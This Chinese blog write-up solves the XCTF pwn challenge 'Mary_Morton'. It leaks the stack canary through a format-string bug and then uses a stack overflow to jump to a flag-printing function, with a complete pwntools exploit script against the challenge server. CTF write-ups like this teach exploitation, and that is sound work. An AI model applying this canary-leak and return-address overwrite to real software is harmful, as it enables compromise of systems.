其他分享
首页 > 其他分享> > [攻防世界 pwn]——Mary_Morton

[攻防世界 pwn]——Mary_Morton

作者:互联网

[攻防世界 pwn]——Mary_Morton

在IDA中看看, 果然有格式化字符串漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
仔细看看代码会发现, 这个是个死循环, 1 里面有栈溢出, 2里面有格式化字符串漏洞, 3是退出。
我们可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用栈溢出修改返回地址了。
在这里插入图片描述
在这里插入图片描述
最近我学了一个新的, 计算偏移的方法,很好用。当然你也可以下断点自己在gdb里面自己看, 自己调试
在这里插入图片描述
一般写八个就够了, 基本都在8个偏移以内,和自身的偏移。好像好多都是6, 这个也是。
因为61对应97就是a
然后找一下canary和输入之间的偏移
在这里插入图片描述在这里插入图片描述
所以最终的偏移为 17 + 6 =23
我们还知道cat_flag的地址

exploit

from pwn import *
p=remote('111.200.241.244',42124)

p.sendlineafter('3. Exit the battle','2')
p.sendline('%23$p')

p.recvuntil('0x')
canary=int(p.recv(16),16)
print "canary:  " + hex(canary)

flag_addr=0x4008da
payload='a'*0x88+p64(canary)+'a'*8+p64(flag_addr)
p.sendlineafter('3. Exit the battle','1')
p.sendline(payload)

p.interactive()

标签:格式化,canary,漏洞,flag,偏移,pwn,Morton,Mary
来源: https://blog.csdn.net/Y_peak/article/details/113881260